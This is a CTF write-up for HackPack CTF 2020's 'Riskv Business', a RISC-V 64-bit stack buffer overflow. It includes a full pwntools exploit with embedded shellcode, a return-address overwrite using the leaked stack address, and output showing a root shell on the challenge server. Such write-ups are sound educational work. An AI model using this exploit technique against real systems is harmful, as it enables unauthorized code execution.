CTFtime.org / HackPack CTF 2020 / Riskv Business / Writeup

# Riskv Business
by mito

## 14 Solves, 494pt

This is a `RISC-V 64bit` binary challenge.

```
$ file pwnme
pwnme: ELF 64-bit LSB executable, UCB RISC-V, version 1 (SYSV), statically linked, for GNU/Linux 4.15.0, BuildID[sha1]=767a1cb9134fcea1f054ec211aacb7bea0c5d0d2, not stripped
```

The vulnerability in this binary is a simple `Stack BoF`.

The stack address(`0x4000800c80`) is leaked.

```
Question 1. What kind of sound do you make when the boogey man jumps out of the shadows and yells 'BOO!' right in your face?!
(Please file your answer in memory at location 0x4000800c80...):
```

We do not have an environment to run RISC-V 64bit binary.

First,we installed `QEMU` referring to the following.

[https://qiita.com/Kosuke_Matsui/items/14aadce506fe3df79600](https://qiita.com/Kosuke_Matsui/items/14aadce506fe3df79600)

We were able to run this binary locally in Ubuntu 16.04 64bit LTS.

```
$ qemu-riscv64 ./pwnme
Question 1. What kind of sound do you make when the boogey man jumps out of the shadows and yells 'BOO!' right in your face?!
(Please file your answer in memory at location 0x40007ffd90...):AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EXACTLY: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Segmentation fault (core dumped)
```

Furthermore, we were able to decompile this binary using `Ghidra` by installing the contents of the following URL.

[https://github.com/mumbel/ghidra_riscv](https://github.com/mumbel/ghidra_riscv)

The decompile result of main function is as follows.
```
int main(void)

{
char acStack96 [8];
char buff [80];

puts(
"Question 1. What kind of sound do you make when the boogey man jumps out of the shadows andyells \'BOO!\' right in your face?!"
);
printf("(Please file your answer in memory at location %p...):",acStack96);
fflush((FILE *)stdout);
mygets(acStack96);
printf("EXACTLY: %s\n");
return 0;
}
```

We used to the `RISC-V shellcode` below.

[http://shell-storm.org/shellcode/files/shellcode-908.php](http://shell-storm.org/shellcode/files/shellcode-908.php)

We tried debugging with `gdb-multiarch` and `gef`, but couldn't completely disassemble `RISC-V`.

Therefore, we made the Exploit code by referring to the C code.

Exploit code and execution result is below.

```
from pwn import *

#context.log_level = 'debug'

BINARY = './pwnme'
#elf = ELF(BINARY)

shellcode = "\x01\x11\x06\xec\x22\xe8\x13\x04\x21\x02\xb7\x67\x69\x6e\x93\x87\xf7\x22\x23\x30\xf4\xfe\xb7\x77\x68\x10\x33\x48\x08\x01\x05\x08\x72\x08\xb3\x87\x07\x41\x93\x87\xf7\x32\x23\x32\xf4\xfe\x93\x07\x04\xfe\x01\x46\x81\x45\x3e\x85\x93\x08\xd0\x0d\x93\x06\x30\x07\x23\x0e\xd1\xee\x93\x06\xe1\xef\x67\x80\xe6\xff"

if len(sys.argv) > 1 and sys.argv[1] == 'r':
HOST = "cha.hackpack.club"
PORT = 41700
s = remote(HOST, PORT)
elif len(sys.argv) > 1 and sys.argv[1] == 'd':
s = process("qemu-riscv64 -g 1337 ./pwnme", shell=True)
else:
s = process("qemu-riscv64 ./pwnme", shell=True)

s.recvuntil("location 0x")
r = s.recvuntil(".")[:-1]

stack_addr = int(r, 16)
print "stack_addr =", hex(stack_addr)

s.recvuntil("):")

buf = shellcode
buf += "A"*(88-len(buf))
buf += p64(stack_addr)
s.sendline(buf)

s.interactive()

'''
mito@ubuntu:~/CTF/HackPack_CTF_2020/Pwn_Riskv_Business$ python solve.py r
[+] Opening connection to cha.hackpack.club on port 41700: Done
stack_addr = 0x4000800c80
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)
$ cd /app
$ ls -l
total 3772
-rw-rw-r-- 1 root root 47 Apr 13 15:47 flag.txt
-rwxr-xr-x 1 root root 447800 Apr 13 15:57 pwnme
-rwxrwxr-x 1 root root 3406664 Apr 13 15:47 qemu-riscv64-static
$ cat flag.txt
flag{mayb3_1t_w1ll_w0rk_th3_f1fth_t1m3_ar0und}
'''
```

Riskv Business

Comments

Sign in with